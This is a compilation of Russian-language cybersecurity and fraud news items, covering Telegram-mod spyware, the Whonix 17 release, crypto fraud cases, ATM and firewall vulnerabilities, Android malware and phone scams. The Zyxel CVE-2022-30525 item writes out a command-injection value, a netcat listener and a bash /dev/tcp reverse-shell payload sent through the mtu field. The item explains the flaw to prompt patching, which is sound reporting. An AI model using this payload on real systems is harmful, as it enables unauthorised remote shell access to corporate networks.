X.org имеет исторические проблемы с безопасностью, например десять лет назад, на 30-й конференции Chaos Communication Congress (CCC) [в докладе исследователя](https://media.ccc.de/v/30C3_-5499-en- saal_1-201312291830-x_security-_ilja_van_sprundel) безопасности Ильи ван Шпрунделя (Ilja van Sprundel) половина презентации была посвящена проблемам в сервере X.Org, а другая половина безопасности клиентских библиотек X11. В докладе Ильи, который в 2013 году выявил 30 уязвимостей, затрагивающих различные клиентские библиотеки X11, а также DRI-компоненты Mesa, [присутствовали](https://lists.x.org/archives/xorg- devel/2013-December/039773.html) такие эмоциональные высказывания, как "GLX - это ужасный демотиватор! 80 000 строк сплошного ужаса!" и "За последние пару месяцев я нашёл в нем 120 ошибок, и я ещё не закончил проверку".
Специалисты «Лаборатории Касперского» нашли в магазине Google Play шпионское ПО, маскирующееся под модифицированные версии Telegram. Малварь предназначалась для сбора конфиденциальной информации со взломанных Android- устройств.


Опасные моды Telegram сопровождались описанием на уйгурском, китайском
традиционном и упрощенном языках. Разработчик этих версий называет их самыми
быстрыми и отмечает, что они используют распределенную сеть центров обработки
данных, расположенных по всему миру.
При запуске такие приложения ничем не отличается от оригинального Telegram, и большинство пакетов приложения похожи на стандартные пакеты мессенджера. Однако исследователи заметили в коде нетипичный для Telegram пакет com.wsys. Список функций, вызывающих com.wsys, указывал на то, что он пытается получить доступ к контактам пользователя. Учитывая, что пакет не входит в стандартную функциональность мессенджера, исследователи сочли это подозрительным.

Функции, вызывающие com.wsys
Дальнейший анализ показал, что библиотека com.wsys запускается в методе connectSocket(), добавленном в класс главной активности, которая отвечает за стартовый экран приложения. Этот метод вызывается при запуске приложения или смене аккаунта. В нем собирается информация о пользователе: имя, ID, номер телефона, после чего приложение подключается к командному серверу.
Кроме того, обнаружилось, что злоумышленники добавили в код обработки входящих сообщений вызов метода uploadTextMessageToService. При получении сообщения он собирает его содержимое, название и ID чата или канала, имя и ID отправителя. Затем вся информация шифруется и кэшируется во временном файле tgsync.s3, этот временный файл приложение периодически отправляет на командный сервер хакеров.
Но даже на краже сообщений вредоносная функциональность приложений не заканчивается. В код обработки контактов злоумышленники добавили вызов метода uploadFriendData. В этом методе собирается информация о контактах пользователя: ID, никнейм, имя и номер телефона. Все это также отправляется на управляющий сервер. Если пользователь решит поменять имя или номер телефона, эта информация тоже будет передана злоумышленникам.

Сбор изменившихся данных пользователя
Отмечается, что если пользователь получает и отправляет какой-либо файл, приложение создает его зашифрованную копию, которая затем загружается в аккаунт злоумышленников в одном из известных облачных хранилищ.
«Описанные в этой статье приложения представляют собой полноценное шпионское ПО, похищающее всю переписку жертвы, его личные данные и контакты и нацеленное на пользователей из определенной страны (Китая). При этом код приложений лишь незначительно отличается от оригинального кода Telegram и смог пройти проверки безопасности Google Play.
Click to expand...
Как видите, публикация приложения в официальном магазине не гарантирует его безопасность, поэтому мы советуем пользователям с осторожностью относиться к сторонним модификациям мессенджеров, даже если они скачаны из Google Play», — резюмируют специалисты.
Click to expand...
В компании отмечают, что уже сообщили об угрозе инженерам Google, однако некоторые вредоносные приложения все еще доступны для скачивания на момент публикации отчета.
[Опубликован](https://forums.whonix.org/t/whonix-17-has-been-released- debian-12-bookworm-based-major-release/16922) релиз дистрибутива Whonix 17, нацеленного на предоставление гарантированной анонимности, безопасности и защиты частной информации. Дистрибутив основан на Debian GNU/Linux и использует Tor для обеспечения анонимности. Наработки проекта распространяются под лицензией GPLv3. Для загрузки подготовлены образы виртуальных машин в формате ova для VirtualBox (2 ГБ c Xfce и 1.3 ГБ консольный). Образ также может быть сконвертирован для использования с гипервизором KVM.
Особенностью Whonix является разделение дистрибутива на два отдельно запускаемых компонента - Whonix-Gateway с реализацией сетевого шлюза для анонимных коммуникаций и Whonix-Workstation с рабочим столом. Оба компонента поставляются внутри одного загрузочного образа. Выход в сеть из окружения Whonix-Workstation производится только через шлюз Whonix-Gateway, что изолирует рабочее окружение от прямого взаимодействия с внешним миром и допускает использование только фиктивных сетевых адресов. Подобный подход позволяет защитить пользователя от утечки реального IP-адреса в случае взлома web-браузера и даже при эксплуатации уязвимости, дающей атакующему root-доступ к системе.
Взлом Whonix-Workstation позволят атакующему получить только фиктивные сетевые параметры, так как реальный IP и параметры DNS скрыты за границей сетевого шлюза, работающего на базе Whonix-Gateway, который направляет трафик только через Tor. При этом следует учитывать, что компоненты Whonix рассчитаны на запуск в форме гостевых систем, т.е. не исключена возможность эксплуатации критических 0-day уязвимостей в платформах виртуализации, которые могут предоставить доступ к хост-системе. В связи с этим, не рекомендуется запускать Whonix-Workstation на том же компьютере, что и Whonix-Gateway.
В Whonix-Workstation по умолчанию предоставляется пользовательское окружение Xfce. В поставку включены такие программы, как VLC, Tor Browser, Thunderbird+TorBirdy, Pidgin и т.д. В поставке Whonix-Gateway можно найти набор серверных приложений, в том числе Apache httpd, ngnix и IRC-серверы, которые могут использоваться для организации работы скрытых сервисов Tor. Возможен проброс поверх Tor туннелей для Freenet, i2p, JonDonym, SSH и VPN. Сравнение Whonix с Tails, Tor Browser, Qubes OS TorVM и corridor можно найти на данной странице. При желании, пользователь может обойтись только Whonix-Gateway и подключить через него свои обычные системы, в том числе Windows, что даёт возможность обеспечить анонимный выход для уже находящихся в обиходе рабочих станций.
Основные изменения:
Источник: https://www.opennet.me/opennews/art.shtml?num=59477
Бывший генеральный директор криптовалютной кредитной компании Celsius, Алекс Машинский (Alex Mashinsky), и директор по доходам компании, Рони Коэн-Павон (Roni Cohen-Pavon), были арестованы по обвинению в мошенничестве с ценными бумагами. Министерство юстиции США обвиняет их в незаконной манипуляции ценой криптовалюты Celsius (CEL) с целью продажи токенов по завышенным ценам.
Напомним, что Celsius привлекла к себе внимание год назад, когда из-за турбулентности на рынке криптовалют неожиданно заблокировала возможность снятия средств и проведения переводов между счетами, объяснив это «экстремальными рыночными условиями». А уже спустя месяц крупнейший криптовалютный кредитор Celsius объявил о банкротстве.
В четверг минюст обнародовал обвинения против Машинского и Коэн-Павона в завышении цены криптовалюты Celsius под названием CEL, а также в том, что они лгали клиентам Celsius о токене, своей деятельности и общем состоянии дел компании. Минюст утверждает, что Машинский и Коэн-Павон незаконно манипулировали ценой CEL, склоняя инвесторов к покупке токенов по завышенным ценам. Минюст утверждает, что продажа токенов принесла 3,6 млн долларов Коэн- Павону и 42 млн долларов Машинскому.
Прокуроры также обвиняют Машинского и Коэн-Павона в том, что они представляли Celsius как место, где клиенты могут «безопасно» хранить криптоактивы и получать проценты. Однако минюст утверждает, что Машинский управлял Celsius как «рискованным инвестиционным фондом», где он принимал «деньги клиентов под ложными и вводящими в заблуждение предлогами».
Помимо ареста Машинского и Коэн-Павона, на компанию Celsius также поступили жалобы от трех федеральных агентств, включая Комиссию по ценным бумагам и биржам (SEC), Комиссию по торговле товарными фьючерсами (CFTC) и Федеральную торговую комиссию (FTC). Все три агентства обвиняют Celsius и Машинского в мошенничестве.
В предложенном мировом соглашении между FTC и Celsius последняя обвиняется в участии в обманных и нечестных действиях и штрафуется на сумму 4,7 млрд долларов. Кроме того, FTC обвиняет Машинского и двух бывших руководителей в том, что они обманули потребителей, заставив их поверить в то, что их активы будут в безопасности и всегда доступны, и запрещает компании работать с активами клиентов.
«Компания Celsius рекламировала новую бизнес-модель, но занималась старомодным мошенничеством, — говорится в заявлении Самуэля Левина (Samuel Levine), директора Бюро по защите прав потребителей в FTC. — Сегодняшние действия, запрещающие Celsius работать с деньгами людей и привлекающие к ответственности её руководителей, должны ясно показать, что новые технологии не стоят выше закона».
Этот случай наглядно демонстрирует потенциальные риски и проблемы, которые могут возникнуть при отсутствии регулирования сферы криптовалют. В то же время, обвинения со стороны нескольких федеральных агентств США подтверждают их решимость сдерживать незаконную деятельность и защищать интересы инвесторов. Этот прецедент может стать важным сигналом для всех участников криптовалютного рынка о необходимости соблюдения законодательства и обеспечения прозрачности своей деятельности.
Окружной суд в США установил залог для соучредителя и бывшего генерального директора Celsius Network в размере $40 млн.
В пятницу, 14 июля, в суде Машинский не признал себя виновным по всем семи пунктам обвинения. Адвокаты заявили, что подзащитный «категорически отрицает выдвинутые обвинения» и что «надеется энергично защищать себя в суде от этих необоснованных обвинений».
Суд постановил: пока Машинский не имеет права открывать новые банковские или криптовалютные счета. Согласно судебным документам, залог заплатит его жена.
В своих атаках злоумышленники использовали 0-day уязвимость в CAS биткоин- банкоматов General Bytes.
18 августа General Bytes опубликовала сообщение, в котором признала существование 0-day уязвимости, активно эксплуатируемой хакерами в дикой природе. Злоумышленники использовали уязвимость в ПО для упpaвлeния paбoтoй aппapaтнoгo oбecпeчeния сервера криптоприложений (CAS) для создания фальшивой учетной записи администратора.
Согласно сообщению компании, атаки проходили следующим образом:
Хакеры сканируют IP-адреса облачного хостинга Digital Ocean на наличие CAS- служб, открывающих порты 7777 или 443;
Затем злоумышленники используют 0-day уязвимость и создают фальшивую учетную запись администратора;
Получив доступ к интерфейсу CAS, хакеры меняют имя учетной записи администратора по умолчанию на “gb”;
И в конце киберпреступники меняли настройки покупки и продажи криптовалюты, а также недействительный адрес платежа.
Изменив нужные настройки, хакеры заставили банкоматы пересылать всю криптовалюту клиентов на своих кошельки. Специалисты пока не могут точно сказать, сколько серверов взломано и криптовалюты украдено.
Сейчас General Bytes не рекомендует клиентам пользоваться банкоматами до установки двух патчей (20220531.38 и 20220725.22) на серверах. Кроме того, компания выложила инструкции по настройке серверных брандмауэров для контроля доступа к CAS.
source:
generalbytes.atlassian.net/wiki/spaces/ESD/pages/2785509377/Security+Incident+August+18th+2022
generalbytes.atlassian.net/wiki/spaces/ESD/pages/954728558/Configuring+Server+Firewalls
Японский издатель игр Bandai Namco подтвердил, что его взломали, заявив, что расследует утечку данных после того, как 3 июля хакеры взломали внутренние системы в нескольких офисах в Азии, за исключением Японии. Известные игры Bandai Namco включают серии Elden Ring, Dark Soul, Pac-Man, Tekken и так далее. До подтверждения Namco группа вымогателей BlackCat утверждала, что украла корпоративные данные во время операции по вторжению, и она еще не раскрыла украденные данные Namco на своем веб-сайте взлома данных. AlphV/BlackCat активен с ноября прошлого года и считается группой вымогателей DarkSide/BlackMatter под новым именем.
https://www.bleepingcomputer[.]com/...hack-after-alphv-ransomware-data-leak- threat/
Исследователи Rapid7 обнаружили критическую уязвимость CVE-2022-30525 (с оценкой CVSS v3: 9,8) в брандмауэре Zyxel. Критические уязвимости брандмауэра могут позволить злоумышленникам получить полный доступ к устройствам и внутренним корпоративным сетям, которые они как бы защищают.
Уязвимость представляет собой возможность ввода удаленной команды без проверки подлинности через интерфейс HTTP в межсетевых экранах Zyxel, поддерживающих Zero Touch Provisioning (ZTP), затрагивая версии встроенного ПО от ZLD5.00 до ZLD5.21.
Выявленная уязвимость эксплуатируется через URI /ztp/cgi-bin/handler. Команды при этом могут выполняться от имени пользователя «nobody». Уязвимая функциональность вызывается командой setWanPortSt. Злоумышленник может ввести произвольные команды в параметр mtu или data.
Например, атакующий может передать в поле mtu строку "; ping 192.168.1.210;" которая приведёт к выполнению в системе команды "ping 192.168.1.210". Для получения доступа к командной оболочке можно запустить на своей системе "nc -lvnp 1270", после чего инициировать обратное соединение (reverse shell) отправив на устройство запрос с параметром '; bash -c "exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;";'.
Типичными последствиями такой атаки будут модификация файлов и выполнение команд ОС, что позволит злоумышленникам получить первоначальный доступ к сети и распространиться по сети. Эксплуатация CVE-2022-30525, прежде всего, позволит злоумышленнику закрепиться во внутренней сети жертвы.
Среди уязвимых моделей: USG FLEX 50, 50W, 100W, 200, 500, 700 с прошивкой 5.21 и ниже; USG20-VPN и USG20W-VPN с прошивкой 5.21 и ниже; ATP 100, 200, 500, 700, 800 с прошивкой 5.21 и ниже, которые в основном используются в небольших офисах и штаб-квартирах для организации VPN, проверки SSL, защиты от вторжений, электронной почты и веб-фильтрации.
Об ошибке ресерчеры сообщили разработчику 13 апреля 2022 года. Изучив представленные исследователи материалы Zyxel подтвердили серьезность уязвимости и пообещали исправить в июне 2022 года, но выпустили исправления в виде автоматического обновления уже 28 апреля 2022 года, не предоставив при этом каких-либо технических подробностей или рекомендаций по смягчению последствий.
Позже, конечно же разработчики исправились и [разместили соответствующие указания клиентам](https://www.zyxel.com/support/Zyxel-security-advisory-for- OS-command-injection-vulnerability-of-firewalls.shtml).
На днях Rapid 7 [опубликовали отчет](https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel- firewall-unauthenticated-remote-command-injection/) с раскрытием технических деталей и соответствующим модулем Metasploit, который используя CVE-2022-30525, вводит команды в поле MTU. Кроме того, открывший багу исследователь Джейк Бейнс продемонстрировал видео с ее эксплуатацией.
Поскольку технические детали и Metasploit доступны и уже изучаются хакерами всех мастей, администраторам необходимо обновить как можно скорее свои устройства, начнется активное использование уязвимости. А это произойдёт однозначно, поскольку на момент всей этой истории в сети обнаруживается до 17 тысяч доступных уязвимых систем.
Выводы делайте сами.
Злоумышленники научились удаленно стирать Android-смартфоны - это стало возможным благодаря вирусу BRATA. Кроме того, данная версия вируса может легко обходить антивирусные программы, [пишет](https://www.xda- developers.com/android-malware-brata-wipe-remotely/) издание XDA-Developers.
Вирус BRATA - не новый. Ранее он использовался для кражи данных банковских карт. Теперь же обновленная версия программы значительно "поумнела" - она может полностью удалить все данные на Android-смартфоне жертвы. Хакеры знают и примерное месторасположение жертвы - у вируса есть доступ к геопозиции смартфона через систему GPS.
"Вредоносную программу для Android-устройств BRATA впервые обнаружили в 2019 году. Она давала удаленный доступ к мобильным устройствам жертв преимущественно в Бразилии. Позднее вредоносное ПО было модифицировано, и в конце 2021 года оно активно атаковало пользователей онлайн-банкинга в Европе. Стали появляться новые варианты, каждый из которых нацелен на определенный банковский софт. Вредонос накладывает свои окна поверх легитимных банковских приложений, что позволяет перехватить учетные данные для входа", - рассказывает Даниил Чернов, директор Центра Solar appScreener компании "Ростелеком-Солар".
По словам эксперта, секрет успеха BRATA в том, что при установке зловред запрашивает высокий уровень доступа, включая права суперадминистратора. "Таким образом, хакеры получают полный пакет привилегий и могут выполнять любые действия в операционной системе. Получив полный контроль над системой, злоумышленники могут изменять, удалять системные файлы и папки", - говорит Чернов.
Основной способ распространения BRATA - через якобы SMS от банка. "В сообщении просят установить приложение, выполняющее критически важные функции безопасности. Оно должно защитить от финансовых краж и обезопасить все операции, которые пользователь выполняет через онлайн-банк. Это часто сопровождается звонком якобы из службы безопасности банка, представитель которого обращает внимание на СМС, просит в целях безопасности установить данную программу и предлагает консультацию в технических вопросах. "В этот момент главная задача злоумышленника - сделать так, чтобы пользователь установил приложение и предоставил ему высокий уровень привилегий, включая права суперадминистратора, просмотр уведомлений, скриншоты учетных данных, перехват второго фактора аутентификации и др", поясняет специалист.
Хакеры "сбрасывают" телефон жертвы в двух случаях. "Во-первых, когда вредонос BRATA успешно провел атаку и передал требуемые данные пользователя, а во- вторых - когда обнаруживает, что его пытаются анализировать с помощью антивирусного ПО".
Для защиты вполне достаточно запретить установку из сторонних источников, продолжает Виктор Чебышев, эксперт по кибербезопасности в "Лаборатории Касперского". Кроме того, специалист добавил, что несмотря на то, что на территории России BARTA пока замечен не был, ему не составит труда появиться и тут.
"Также следует ставить приложения и обновления только из официального магазина", - напомнил Алексей Новиков, директор по развитию бизнеса ESET.
В основу нового законопроекта легли принципы американского «акта Магнитского».
Сенат Австралии единогласно принял законопроект, разрешающий непосредственно вводить санкции против киберпреступников. Законопроект в случае вступления в силу позволит австралийскому правительству напрямую вводить санкции против физических или юридических лиц, запрещая им посещать Австралию или делать какие-либо инвестиции в стране.
Как сообщило издание The Australian, в основу нового законопроекта легли принципы американского «акта Магнитского», однако австралийские законодатели расширили его возможностью вводить санкции также в отношении «лиц, занимающихся вредоносной кибердеятельностью, которая затрагивает интересы Австралии».
«Законопроект даст властям возможность своевременно принимать меры в ответ на проблемы, вызывающие международную озабоченность, независимо от мест, где они возникают. Перекрыв доступ в нашу страну и нашу экономику исполнителям и выгодоприобретателям таких преступлений, <...> мы гарантируем, что они не смогут воспользоваться свободами, которые обеспечивает наша демократия, и что Австралия не станет убежищем для таких людей и организаций», – сообщила глава австралийского МИД Марис Пейн (Marise Ann Payne).
Акт о верховенстве закона и подотчетности имени Сергея Магнитского был принят в США в 2012 году. Он предусматривает использование односторонних санкций в отношении российских должностных лиц, виновных, с точки зрения Вашингтона, в нарушении прав человека на родине. В 2016 году в США был принят «Глобальный акт о правах человека имени Магнитского», предусматривающий возможность распространения действия «закона Магнитского» на другие страны, а не только на Россию.
Вредоносная программа может адаптироваться к новой среде, маскироваться и даже работать автономно, когда нет связи с коммандным сервером.
Специалисты в области кибербезопасности из компании BioBright сообщили о кибератаке на предприятие по производству биопродуктов, в ходе которой использовалось необычное вредоносное ПО под названием Tardigrade.
Как обнаружили эксперты, Tardigrade имеет большой функционал и не ограничивается простым блокированием компьютеров по всему объекту. Вредоносная программа может адаптироваться к новой среде, маскироваться и даже работать автономно, когда она отключена от своего управляющего сервера. Сложность вредоноса и другие данные цифрового анализа указывают на хорошо финансируемую и мотивированную APT-группировку.
«Это, безусловно, самое сложное вредоносное ПО, которое мы когда-либо видели в этой сфере. Это очень похоже на другие атаки и кампании APT-группировок, нацеленные на другие отрасли», — отметили эксперты.
Tardigrade имеет некоторое сходство с популярным загрузчиком вредоносных программ Smoke Loader (также известный как Dofoil), который использовался для распространения вредоносных программ как минимум с 2011 года. Несмотря на сходство с Smoke Loader, Tardigrade кажется более продвинутым и предлагает расширенный набор конфигураций. Вредонос обладает функциональностью трояна и после установки в сети жертвы ищет сохраненные пароли, развертывает кейлоггер, начинает похищать данные и устанавливает бэкдор.
Как отметили исследователи, вредоносное ПО ведет себя по-разному в зависимости от среды, поэтому сигнатура постоянно меняется, и его труднее обнаружить. Эксперты тестировали вредонос почти 100 раз, и каждый раз он собирался на системе по-другому и взаимодействовал по-разному.
Tardigrade может принимать решения о том, как действовать в сети жертвы, даже при отсутствии связи с операторами. Как предположили специалисты, Tardigrade в первую очередь предназначена для распространения с помощью фишинговых атак, но также может распространяться через зараженные USB-накопители или даже автономно перемещаться из одной зараженной сети в другую.
Подробнее: https://www.securitylab.ru/news/526785.php
В России мошенники [начали создавать](https://iz.ru/1808785/anton- belyi/fejkova-gramota-v-seti-poyavilis-fishingovye-sajty-s-razblokirovkoj- viber) сайты, которые предлагают пользователям услуги по установке «безопасной версии» Viber и инструкции по «обходу блокировок». Те, кто переходит по вредоносным ссылкам на эти ресурсы, могут лишиться аккаунта в мессенджере, хищениями паролей и других данных.
Руководитель департамента расследований T.Hunter, эксперт рынка НТИ SafeNet Игорь Бедеров рассказал, что под видом установки «безопасной версии Viber» распространяются вирусы-трояны, а также происходит фишинг. По его словам, чаще всего злоумышленники действуют путём телефонного мошенничества. Для этого они регистрируют аккаунт в мессенджере на российские номера, а потом звонят пользователям в РФ. Кроме того, на сайтах и в соцсетях появляются баннеры про «обход блокировки». Вскоре также могут появиться и приложения-двойники Viber в магазинах.
Специалист компании F.A.C.C.T. по противодействию финансовому мошенничеству Дмитрий Дудков отметил, что популярность Viber у мошенников можно объяснить относительной простотой угона аккаунтов и первичной регистрации. Это позволяет злоумышленникам продолжительное время общаться с жертвами с одного и того же аккаунта. Кроме того, в Viber сложнее сформировать жалобу на спам-рассылки и звонки.
В инструкциях, которые мошенники распространяют в даркнете, Viber упоминается в числе мессенджеров, не рекомендуемых для передачи информации.
Руководитель службы информационной безопасности ГК InfoWatch Роман Алабин говорит, что мессенджер используется злоумышленниками для типичных способов — это мошеннические звонки, в том числе с имперсонацией — когда злоумышленник выдает себя за родственника или руководителя жертвы. Основная аудитория Viber в России — люди старше 40 лет, которые более уязвимы к мошенническим схемам.
Основатель компании «Страховой брокер AMsec24» Антон Мельцов говорит, что мошенники могут отправлять сообщения, которые выглядят как официальные уведомления от Viber или других сервисов, с просьбой подтвердить личные данные или перейти по ссылке, а те ведут на фальшивые сайты.
Аналитик департамента защиты от цифровых рисков F.A.С.С.T. Евгений Егоров считает, что на фоне блокировок злоумышленники могут предложить пользователям установить на замену мессенджера его «доступную в России» зловредную версию. Также они могут создавать мошеннические сайты, стилизованные под официальный ресурс Viber, для кражи денег пользователей, как это было в начале 2020-х, например, якобы для выплаты пользователям каких-либо «компенсаций».
В Роскомнадзоре заявили, что в 2024 году выявили и заблокировали 30,3 тыс. фишинговых ресурсов и 127 центров управления вредоносным программным обеспечением. Число блокировок выросло на 558% для фишинг-сайтов и на 164% — для центров управления вирусным ПО.
Старший аналитик исследовательской группы Positive Technologies Анна Голушко рассказала, что по итогам первых трёх кварталов 2024 года методом социальной инженерии было совершено 89% всех успешных атак на частных лиц.
Отдел экономических преступлений полиции Дели арестовал двух человек, которые обвиняются в мошенничестве на 80 миллионов рупий (92,45 миллиона рублей). По данным Orissa Post, эти деньги обвиняемые заполучили по 85 заявкам на кредиты, которые были выданы им при попустительстве высокопоставленного чиновника Государственного банка Индии (State Bank of India, SBI).
Дело о крупной краже расследуется полицией индийской столицы с апреля 2023 года. Тогда к ним принес заявление о краже региональный менеджер SBI. Он обратил внимание на то, что в период с сентября 2021-го по сентябрь 2022 года глава отделения банка в Пхулбани (штат Одиша) Асутош Ачарья (Asutosh Acharya) выдал 59 кредитов людям, которые по своему статусу не могли на них претендовать.
Спустя некоторое время он выплатил еще 26 пенсионных кредитов своим родственникам, не все из которых достигли преклонного возраста, а некоторые даже оказались давно мертвы. Позднее все эти средства были переведены с банковских счетов получателей на счета двоих арестованных.
Следствие подозревает, что в этой схеме могли принимать участие другие люди, причем как в роли кредитуемых, так и в роли пособников. Не исключено, что не все они осведомлены о своем участии в преступной схеме.
58-летнему Сергею позвонили и представившись сотрудниками мобильного оператора, сообщили, что заканчивается договор на телефонный номер.
Поэтому ему, как напирал звонивший, нужно сказать код, который «вот-вот придет с Госуслуг». Когда Сергей сообщил код, через какое-то время «ему позвонили уже с Госуслуг и напугали, что его аккаунт взломали мошенники».
Следующим этапом стал звонок «от Роскомнадзора». Лжесотрудник ведомства пояснил Сергею, что его деньги в опасности, поэтому лицевой счет следует «обновить». Мошенники вызвали жертве такси, мужчина «покатался по отделениям и перевел им 718 тысяч рублей тремя транзакциями».
Финальным штрихом в этой истории стала необычная просьба от лжесотрудника Роскомнадзора. Он позвонил Сергею и попросил его спеть гимн России. В этот момент мужчина догадался, что его обманули, и бросил трубку. Последней весточкой от мошенников стала любезная смска: "спасибо за деньги".
Как сообщили в федеральной прокуратуре Южного округа штата Нью-Йорк в Манхэттене, 3 ноября там признал себя виновным в мошенничестве с медицинскими страховками пострадавших в ДТП, взятках и других преступлениях 37-летний Александр Гулькаров по прозвищу «Малыш Алекс».
Проживавший в Квинсе «Малыш» был арестован 12 января прошлого года в Майами и через два дня освобожден под залог в 10 млн долларов с обязательством не контактировать с сообщниками, которых арестовали в тот же день в Нью-Йорке. Залог за его освобождение был обеспечен недвижимостью в виде трех домов в районе Форест-Хиллс в Квинсе, одного в районе Фреш-Медоуз тоже в Квинсе и двух в городке Ютика на севере штата Нью-Йорк.
Как положено, ему было запрещено общаться с сообщниками, покидать Южный и Восточный округи штата Нью-Йорк и сдать проездные документы. Сообщников у него набралась дюжина, и их арестовали в тот же день в Нью-Йорке, поделили на две группы, в «Организацию Гулькарова» из «наших» вошли Роман Исраилов, он же «Роман Мататов», Петр Хаимов, он же «Питер Хаим» и Альберт Аронов, патрульный 83 участка полиции на Никербокер-авеню в Бруклине. Туда же вошли 44-летний адвокат Роберт Висницки, судя по фамилии, польских кровей; врач Роландо Чумасейро, которому дали русское прозвище «Чума», и врач-иглоукалыватель Марсело Кирога без всяких кличек. Во вторую группу, которую назвали «Организация Брэдли Пьерра», вошли пятеро, среди которых «русский» только один – 56-летний Артур Богораз, о котором особый разговор. Дело слушает 66-летний судья Пол Гарауфис, которого в 2008 году назначил президент-республиканец Буш- младший.
Как заявил в пресс-релизе 3 ноября манхэттенский федеральный прокурор Дамиан Уильямс, «Александр Гулькаров был одним из руководителей многогранной схемы обмана компаний страхования автомобилей, подкупа работников больниц, диспетчеров службы ‘911’ и других, а также отмывания сотен тысяч долларов и помехах работе правоохранительных органов. Эта сложная афера обошлась (ее жертвам) потерей больше 40 млн долларов, которыми Гулькаров оплачивал роскошный образ жизни, роскошный отдых по всему миру, дорогую еду, ювелирные изделия и гулянки, а также капитальной ремонт своего трехэтажного дома в Квинсе стоимостью несколько миллионов долларов». Далее следовало обычное заверение, что прокуратура Уильямса на потерпит ничего подобного. В январе прошлого года, когда обе организации были арестованы, он пояснил, что «13 обвиняемых, которым предъявлены обвинения, предположительно коллективно совершили одно из крупнейших страховых мошенничеств в истории», и «получая конфиденциальную информацию о жертвах дорожно-транспортных происшествий, они затем подвергали их здоровье опасности ненужными и часто болезненными медицинскими процедурами, чтобы мошенническим образом завышать счета страховых компаний”. Звучало это грозно и загадочно, а на самом деле было давно известной и довольно простой незаконной наживой на законе «No-fault insurance», который в штатах Нью-Йорк и Нью-Джерси обязывает автомобильные страховые компании оплачивать лечение всех пострадавших в ДТП на сумму до 50 тыс. долларов и вне зависимости от их вины. Аферы с «ноу-фолт» давно стали присказкой к сказке о том, как нарушают закон русскоязычные иммигранты, хотя грешат этим и все остальные.
Суть такой аферы, повторяю, проста и надежна. Поставщик информации о ДТП – в данном случае полицейский Аронов, снабжает аферистов данными потерпевших и адресами больницы куда их доставили, если такое было. Их навещают участники преступной группы, которых называют «бегунки» (“runners”), которые убеждают или предлагают пройти бесплатное лечение, а затем, возможно, с помощью адвоката получить значительную компенсацию. Участвующие в афере врачи проводят такое лечение по полной и часто ненужной программе, а счета за него представляют к оплате страховым компаниям. В данном случае обвинение утверждало, что эта афера стоила около 100 млн долларов, а признав себя виновным Гулькаров согласился заплатить 40 млн в погашение ущерба и столько же в виде штрафа, хотя на его «организацию» пришлось только 30 млн долларов незаконной наживы, а остальные 70 млн предположительно получила «организация Брэдли Пьерра».
В предъявленном обвинении по полочкам раскладывалось, как все это происходило. Полицейской Аронов имел доступ к служебным компьютерам и в не рабочее время пользовался этим доступом, знакомясь с рапортами о ДТП. Как утверждает обвинение, он сфотографировал на свой мобильник больше 400 таких рапортов, которые переправил Гулькарову через защищённое, то есть недоступное посторонним, приложение. «Бегунки» которого связывались с пострадавшими, представлялись сотрудниками городской автоинспекции DOT (Department of Transportation) и предписывали пройти необходимый по закону курс лечения в конкретных клиниках. Позже «бегунки» получали от 1,5 до 3 тыс. долларов за каждого пострадавшего, на котором удалось заработать. В обвинении отмечалось, что Гулькаров «отмывал полученную прибыль через банковские счета медицинских клиник и аптек на свой личный счет различными способами». В частности, он просил выписывать ему чеки с непредставленной суммой, которую вписывал по мере необходимости. Помимо этого, утверждает прокуратура, Гулькаров отмывал деньги с помощью адвоката Роберта Висницки через его офисы Wisnicki & Associates и Wisnicki Neuhauser в Квинсе. На счета этих офисов от клиник, лечивших по закону No-Fault, были выписаны чеки больше чем на 150 тыс. долларов, хотя никакой юридической помощи этим клиникам не оказывалось, а на эти деньги Висницски приобрел недвижимость для одного из сообщников Гулькарова.
«Организацию Брэда Пьера» обвиняют в том, что, занимаясь тем же, шестеро ее участников руководили работой пяти клиник, включая центр магнитно-резонансной томографии MRI. Одним из шестерых был 56-летний Артур Богораз, о котором я писал 22 года назад, когда 1 октября 2011 года в бруклинское отделение Верховного суда штата Нью-Йорк суд доставили арестованного в Пуэрто-Рико ньюйоркца Артура Богораза, которому предъявили 61 пункт обвинения в мошенничестве с медицинскими страховками, хищении в крупных размерах, краже личных данных и отмывании денег, в чем он не признал себя виновным. Лицензированный пилот, Богораз прилетел в Пуэрто-Рико с карибского острова- курорта Сент-Мартин на собственном самолёте. В заявлении тогдашнего генерального прокурора штата Нью-Йорк Эрика Шнайдермана сказано, что 34-летний Богораз занимался аферами, связанными с законом «no-fault insurance» и с июля 2006 по декабрь 2009 года Артур Богораз похитил больше 4,5 млн долларов.
Шнайдерман назвал Богораза «мошенником, который придумал обширный план, как обмануть страховые компании на миллионы долларов». Сам Артур Богораз не был лицензированным врачом с правом открыть клинику, а менеджером, которым может стать любой. По данным прокуратуры, он «убеждал врачей-радиологов работать с ним и обещал, что счета за каждую проведенную ими процедуру MRI ((Magnetic Resonance Imaging - Магнитно-резонансной томографии) будут надлежаще обработаны и поступят для оплаты в страховые компании по закону «ноу-фолт». Если врачи соглашались, Богораз, которому за много лет принадлежало несколько менеджерских компаний в Квинсе и Бруклине, пользовался своим доступом к их личной информации и регистрировал другие радиологические корпорации, часто без ведома и согласия врачей. Другими словами, то была та же самая афера, за которую его снова арестовали через два десятка лет.
Компания испытывает проблемы с ликвидностью после краха FTX.
Криптовалютный брокер Genesis предупредил инвесторов, что может быть вынужден
объявить о банкротстве, если не сможет привлечь новое финансирование,
[сообщает](https://www.bloomberg.com/news/articles/2022-11-21/crypto-firm-
genesis-warns-of-possible-bankruptcy-without-funding) Bloomberg.
Как пишет издание со ссылкой на собственные источники, последние несколько
дней Genesis активно пытается привлечь как минимум $1 млрд нового капитала.
Компания, в частности, вела переговоры с криптобиржей Binance и с
инвестиционным фондом Apollo Global Management, но пока не получила
дополнительных инвестиций, указывает Bloomberg.
Брокер начал активно искать финансирование после кризиса ликвидности,
вызванного крахом криптовалютной биржи
FTX. Genesis объявила, что $175
млн, принадлежащих её деривативному подразделению, оказались заблокированы на
счёте FTX, и приостановила вывод средств.
Банкротство Genesis наступит в том случае, если компании не удастся привлечь
финансирование для того, чтобы обеспечить средствами свое кредитное
подразделение.
О банкротстве FTX стало известно 11 ноября. В этот же день Комиссия по ценным
бумагам Багамских островов заморозила средства компании.
В комментарии Bloomberg представители Genesis заявили, что настроены на поиск
выхода из сложившейся ситуации.
6 мая 2022 года Сбербанк отразил самую мощную DDoS-атаку в своей истории.
